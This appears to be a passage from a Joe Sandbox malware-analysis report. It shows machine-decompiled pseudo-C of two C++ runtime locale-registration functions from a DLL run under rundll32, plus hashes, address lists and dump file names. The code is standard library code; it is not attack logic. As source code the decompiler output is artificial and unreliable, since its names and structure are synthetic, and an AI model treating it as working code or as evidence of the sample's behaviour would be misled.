                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 5141e150c987f14687410213f946ae7ab3c68ea652f40b7dca6d7c74b60acb0f
                          • Instruction ID: d08d6b302eae1b797f4fb565c8de8d8823559af4b1c173fd64c924e421521c79
                          • Opcode Fuzzy Hash: 5141e150c987f14687410213f946ae7ab3c68ea652f40b7dca6d7c74b60acb0f
                          • Instruction Fuzzy Hash: B811CE7991451ECBCF04DBE0C894AEDB7BBBF44B14F140919E510AB390DBB89E41CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B93E, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E21B93E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t242 - 0x14, 0);
				_t231 =  *0x6e2c6e34; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6E1E161C(0x6e2c6e14);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6E2066BA(_t242 - 0x14);
					return E6E220075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6E21C0B8(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t242 - 0x20);
							E6E223D74(_t242 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t225, _t231, 0x14);
							E6E206653(_t242 - 0x14, 0);
							_t232 =  *0x6e2c6e3c; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6E1E161C(0x6e2c6e1c);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6E2066BA(_t242 - 0x14);
								return E6E220075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6E21C120(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t242 - 0x20);
										E6E223D74(_t242 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t172, _t226, _t232, 0x14);
										E6E206653(_t242 - 0x14, 0);
										_t233 =  *0x6e2c6e38; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6E1E161C(0x6e2c6e18);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6E2066BA(_t242 - 0x14);
											return E6E220075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6E21C1A4(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t242 - 0x20);
													E6E223D74(_t242 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t172, _t227, _t233, 0x14);
													E6E206653(_t242 - 0x14, 0);
													_t234 =  *0x6e2c6e40; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6E1E161C(0x6e2c6e20);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6E2066BA(_t242 - 0x14);
														return E6E220075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6E21C229(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t242 - 0x20);
																E6E223D74(_t242 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t172, _t228, _t234, 0x14);
																E6E206653(_t242 - 0x14, 0);
																_t235 =  *0x6e2c6e44; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6E1E161C(0x6e2c6e24);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6E2066BA(_t242 - 0x14);
																	return E6E220075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6E21C295(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6E1E1438(_t207);
																			E6E223D74(_t242 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e26851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6e26c414;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6E21D028(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6E220075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6E206FD3(__eflags, _t229);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6e2c6e44 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6E206FD3(__eflags, _t228);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6e2c6e40 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6E206FD3(__eflags, _t227);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6e2c6e38 = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6E206FD3(__eflags, _t226);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6e2c6e3c = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6E206FD3(__eflags, _t225);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6e2c6e34 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}





















                          0x6e21b93e
                          0x6e21b93e
                          0x6e21b945
                          0x6e21b94f
                          0x6e21b954
                          0x6e21b95f
                          0x6e21b963
                          0x6e21b966
                          0x6e21b96b
                          0x6e21b96f
                          0x6e21b974
                          0x6e21b978
                          0x6e21b9bd
                          0x6e21b9c0
                          0x6e21b9cc
                          0x6e21b97a
                          0x6e21b97c
                          0x6e21b982
                          0x6e21b988
                          0x6e21b990
                          0x6e21b993
                          0x6e21b9d0
                          0x6e21b9de
                          0x6e21b9e3
                          0x6e21b9eb
                          0x6e21b9f5
                          0x6e21b9fa
                          0x6e21ba05
                          0x6e21ba09
                          0x6e21ba0c
                          0x6e21ba11
                          0x6e21ba1a
                          0x6e21ba1c
                          0x6e21ba1e
                          0x6e21ba63
                          0x6e21ba66
                          0x6e21ba72
                          0x6e21ba20
                          0x6e21ba20
                          0x6e21ba22
                          0x6e21ba28
                          0x6e21ba2e
                          0x6e21ba36
                          0x6e21ba39
                          0x6e21ba76
                          0x6e21ba84
                          0x6e21ba89
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21bac0
                          0x6e21bac2
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8
                          0x6e21ba3b
                          0x6e21ba3b
                          0x6e21ba3e
                          0x6e21ba42
                          0x6e21ba46
                          0x6e21ba53
                          0x6e21ba5b
                          0x6e21ba5d
                          0x00000000
                          0x6e21ba5d
                          0x6e21ba24
                          0x6e21ba24
                          0x00000000
                          0x6e21ba24
                          0x6e21ba22
                          0x6e21b995
                          0x6e21b995
                          0x6e21b998
                          0x6e21b99c
                          0x6e21b9a0
                          0x6e21b9ad
                          0x6e21b9b5
                          0x6e21b9b7
                          0x00000000
                          0x6e21b9b7
                          0x6e21b97e
                          0x6e21b97e
                          0x00000000
                          0x6e21b97e
                          0x6e21b97c

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B945
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B94F
                          • int.LIBCPMT ref: 6E21B966
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E21B9A0
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B9C0
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21B9DE
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 12d9f1bb7d0f9f2ca665b1fbe3dd440f4633d0f2298e9e35950886ecf55a60fe
                          • Instruction ID: b30431928973617535b6f04673bde7e034cd3064f742672db61ea0d389a179d7
                          • Opcode Fuzzy Hash: 12d9f1bb7d0f9f2ca665b1fbe3dd440f4633d0f2298e9e35950886ecf55a60fe
                          • Instruction Fuzzy Hash: 5F11BC7990451ECBCB04EBE0C894AEDB7BBBF44B14F140919E510AB390DBB49E45CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F94B, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F94B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t286 - 0x14, 0);
				_t273 =  *0x6e2c6ddc; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6E1E161C(0x6e2c6d88);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6E2066BA(_t286 - 0x14);
					return E6E220075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6E211409(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t286 - 0x20);
							E6E223D74(_t286 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t266, _t273, 0x14);
							E6E206653(_t286 - 0x14, 0);
							_t274 =  *0x6e2c6de0; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6E1E161C(0x6e2c6d8c);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6E2066BA(_t286 - 0x14);
								return E6E220075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6E211471(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t286 - 0x20);
										E6E223D74(_t286 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t203, _t267, _t274, 0x14);
										E6E206653(_t286 - 0x14, 0);
										_t275 =  *0x6e2c6dfc; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6E1E161C(0x6e2c6da8);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6E2066BA(_t286 - 0x14);
											return E6E220075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6E2114EC(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t286 - 0x20);
													E6E223D74(_t286 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t203, _t268, _t275, 0x14);
													E6E206653(_t286 - 0x14, 0);
													_t276 =  *0x6e2c6dcc; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6E1E161C(0x6e2c6d80);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6E2066BA(_t286 - 0x14);
														return E6E220075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6E211558(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t286 - 0x20);
																E6E223D74(_t286 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t203, _t269, _t276, 0x14);
																E6E206653(_t286 - 0x14, 0);
																_t277 =  *0x6e2c6e00; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6E1E161C(0x6e2c6dac);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6E2066BA(_t286 - 0x14);
																	return E6E220075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6E2115C4(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t286 - 0x20);
																			E6E223D74(_t286 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t203, _t270, _t277, 0x14);
																			E6E206653(_t286 - 0x14, 0);
																			_t278 =  *0x6e2c6dd0; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6E1E161C(0x6e2c6d60);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6E2066BA(_t286 - 0x14);
																				return E6E220075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6E21162A(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6E1E1438(_t245);
																						E6E223D74(_t286 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e26851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6e26c0c4;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6E21542F(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6E220075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6E206FD3(__eflags, _t271);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6e2c6dd0 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6E206FD3(__eflags, _t270);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6e2c6e00 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6E206FD3(__eflags, _t269);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6e2c6dcc = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6E206FD3(__eflags, _t268);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6e2c6dfc = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6E206FD3(__eflags, _t267);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6e2c6de0 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6E206FD3(__eflags, _t266);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6e2c6ddc = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}
























                          0x6e20f94b
                          0x6e20f94b
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f97c
                          0x6e20f981
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
